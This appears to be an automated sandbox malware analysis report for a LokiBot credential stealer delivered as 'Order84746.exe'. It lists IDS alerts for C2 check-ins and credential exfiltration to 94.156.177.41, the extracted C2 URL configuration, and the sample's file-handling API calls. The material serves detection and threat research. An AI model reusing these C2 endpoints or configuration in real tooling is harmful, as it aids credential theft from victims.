              2024-11-29T07:37:16.845716+010028257661Malware Command and Control Activity Detected192.168.2.44974094.156.177.4180TCP
              2024-11-29T07:37:21.749992+010028257661Malware Command and Control Activity Detected192.168.2.44974494.156.177.4180TCP
              2024-11-29T07:37:23.468794+010028257661Malware Command and Control Activity Detected192.168.2.44974694.156.177.4180TCP
              2024-11-29T07:37:25.297011+010028257661Malware Command and Control Activity Detected192.168.2.44974794.156.177.4180TCP
              2024-11-29T07:37:30.107976+010028257661Malware Command and Control Activity Detected192.168.2.44974894.156.177.4180TCP
              2024-11-29T07:37:32.298014+010028257661Malware Command and Control Activity Detected192.168.2.44974994.156.177.4180TCP
              2024-11-29T07:37:34.000360+010028257661Malware Command and Control Activity Detected192.168.2.44975094.156.177.4180TCP
              2024-11-29T07:37:35.905770+010028257661Malware Command and Control Activity Detected192.168.2.44975194.156.177.4180TCP
              2024-11-29T07:37:37.671798+010028257661Malware Command and Control Activity Detected192.168.2.44975294.156.177.4180TCP
              2024-11-29T07:37:39.516381+010028257661Malware Command and Control Activity Detected192.168.2.44975394.156.177.4180TCP
              2024-11-29T07:37:41.298199+010028257661Malware Command and Control Activity Detected192.168.2.44975494.156.177.4180TCP
              2024-11-29T07:37:43.127928+010028257661Malware Command and Control Activity Detected192.168.2.44975594.156.177.4180TCP
              2024-11-29T07:37:44.826715+010028257661Malware Command and Control Activity Detected192.168.2.44975694.156.177.4180TCP
              2024-11-29T07:37:46.499557+010028257661Malware Command and Control Activity Detected192.168.2.44975794.156.177.4180TCP
              2024-11-29T07:37:48.348566+010028257661Malware Command and Control Activity Detected192.168.2.44975894.156.177.4180TCP
              2024-11-29T07:37:50.256361+010028257661Malware Command and Control Activity Detected192.168.2.44975994.156.177.4180TCP
              2024-11-29T07:37:55.174548+010028257661Malware Command and Control Activity Detected192.168.2.44976094.156.177.4180TCP
              2024-11-29T07:37:56.938795+010028257661Malware Command and Control Activity Detected192.168.2.44976394.156.177.4180TCP
              2024-11-29T07:37:58.812353+010028257661Malware Command and Control Activity Detected192.168.2.44976494.156.177.4180TCP
              2024-11-29T07:38:01.082225+010028257661Malware Command and Control Activity Detected192.168.2.44977094.156.177.4180TCP
              2024-11-29T07:38:02.758235+010028257661Malware Command and Control Activity Detected192.168.2.44977694.156.177.4180TCP
              2024-11-29T07:38:04.577451+010028257661Malware Command and Control Activity Detected192.168.2.44978294.156.177.4180TCP
              2024-11-29T07:38:06.307814+010028257661Malware Command and Control Activity Detected192.168.2.44978894.156.177.4180TCP
              2024-11-29T07:38:08.178167+010028257661Malware Command and Control Activity Detected192.168.2.44978994.156.177.4180TCP
              2024-11-29T07:38:13.081566+010028257661Malware Command and Control Activity Detected192.168.2.44980594.156.177.4180TCP
              2024-11-29T07:38:14.764601+010028257661Malware Command and Control Activity Detected192.168.2.44980694.156.177.4180TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://94.156.177.41/davinci/five/fre.phpAvira URL Cloud: Label: phishing
              Found malware configuration
              Source: 1.2.svchost.exe.400000.0.unpackMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "\u00c6\u00cb\u00d1\u00ce\u00ca\u00c9\u00d1\u00ce\u00c8\u00c8\u00d1\u00cb\u00ce\u00d0\u009b\u009e\u0089\u0096\u0091\u009c\u0096\u00d0\u0099\u0096\u0089\u009a\u00d0\u0099\u008d\u009a\u00d1\u008f\u0097\u008f"]}
              Multi AV Scanner detection for submitted file
              Source: Order84746.exeReversingLabs: Detection: 26%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: Order84746.exeJoe Sandbox ML: detected
              Source: Order84746.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: Binary string: wntdll.pdbUGP source: Order84746.exe, 00000000.00000003.1675657454.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, Order84746.exe, 00000000.00000003.1675962335.0000000003970000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: Order84746.exe, 00000000.00000003.1675657454.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, Order84746.exe, 00000000.00000003.1675962335.0000000003970000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000001.00000002.2659065134.0000000000FA1000.00000020.00000001.01000000.00000005.sdmp
              Source: Binary string: svchost.pdbUGP source: svchost.exe, 00000001.00000002.2659065134.0000000000FA1000.00000020.00000001.01000000.00000005.sdmp
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00926CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00926CA9
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_009260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_009260DD
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_009263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_009263F9
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0092EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0092EB60
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0092F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0092F5FA
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0092F56F FindFirstFileW,FindClose,0_2_0092F56F
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00931B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00931B2F
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00931C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00931C8A
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00931F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00931F94
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49732 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49730 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49732 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49732 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49755 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49755 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49747 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49736 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49736 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49757 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49757 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49757 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49735 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49755 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49747 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49747 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49734 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49736 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49734 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49734 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49730 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49805 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49735 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49805 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49730 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49805 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49789 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49789 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49789 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49750 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49750 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49750 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49805 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49805 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49788 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49788 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49788 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49730 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49744 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49744 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49750 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49744 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49750 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49788 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49789 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49789 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49788 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49805
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49764 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49764 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49764 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49738 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49740 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49770 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49736 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49770 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49764 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49738 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49764 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49738 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49757 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49748 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49748 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49735 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49732 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49734 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49732 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49750
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49736 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49753 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49735 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49753 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49748 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49731 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49753 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49789
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49740 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49747 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49740 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49738 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49757 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49738 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49770 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49733 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49740 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49733 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49740 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49744 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49735 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49744 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49748 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49747 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49753 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49754 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49731 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49736
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49754 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49764
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49748 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49770 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49770 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49782 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49740
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49788
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49738
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49757
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49746 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49753 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49746 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49746 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49755 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49755 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49747
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49746 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49759 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49746 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49759 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49754 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49755
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49732
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49731 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49746
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49733 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49759 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49753
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49754 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49754 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49733 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49731 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49749 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49748
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49782 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49782 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49733 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49754
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49776 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49776 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49782 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49782 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49770
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49752 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49752 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49735
